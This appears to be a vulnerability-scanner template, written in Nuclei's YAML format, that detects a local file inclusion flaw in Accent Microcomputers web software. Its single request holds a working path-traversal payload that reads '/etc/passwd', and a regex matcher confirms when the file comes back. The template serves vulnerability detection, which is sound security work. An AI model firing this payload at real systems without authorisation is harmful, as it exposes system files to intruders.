id: accent-microcomputers-lfi info: name: Accent Microcomputers LFI author: 0x_Akoko severity: high description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. reference: - https://cxsecurity.com/issue/WLB-2018050036 - http://www.accent.com.pl classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 tags: microcomputers,accent,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # Enhanced by mp on 2022/03/02